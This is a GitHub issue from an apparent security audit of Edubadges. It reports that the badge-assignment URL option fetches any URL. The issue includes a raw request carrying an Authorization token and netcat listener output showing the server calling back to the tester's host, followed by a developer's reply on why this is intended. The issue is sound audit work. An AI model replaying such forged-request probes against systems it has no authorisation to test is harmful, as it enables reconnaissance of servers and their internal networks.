search

edubadges / audit

Code audit repo for Edubadges
0 stars 0 forks source link

The Add Url Option of the Assign Badge functionality Allows All Urls #40

Closed sveeke closed 5 years ago

sveeke commented 6 years ago

The Add Url Option of the Assign Badge functionality does not use a whitelist to restrict from which urls it could load badge images from.

The following request was send to our test host that was listening for an incoming request on port 80

Request:

POST /v1/earner/badges?json_format=plain HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 820bf48af092a422a5e37fd2805daf03d78bd48d
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/recipient/badges
Content-Length: 31
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"url":"http://omega.svits.nl"}
omega# nc -nlvp 80
listening on [any] 80 ...
connect to [5.2.67.184] from (UNKNOWN) [145.101.112.185] 49920
GET / HTTP/1.1
Host: omega.svits.nl
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: application/ld+json, application/json, image/png, image/svg+xml
User-Agent: python-requests/2.18.1

The request was received by our testserver.

Impact: With the current installed version of the Python request plugin no vulnerabilites are known that could result in exploitation. However allowing all domains to interact would still increase the attack vector.

Recommendation:

ottonomy commented 6 years ago

The verifier django app (in badgr-server) that is in the version of code under test is the one that uses the python requests library to make this request, and it should not be limited to only certain domains, because it is intended to allow verification of an open badge from any domain. In the current version of badgr-server (and the slightly older version used by SURFnet's POC server), the openbadges python library replaces the verifier django app, but it implements the same behavior. A user may cause badgr-server to make requests to a malicious server, which could do harmful things like intentionally slow down requests to impact performance of the badgr-server. It is unlikely that requesting content from another server in this context would cause any security issues.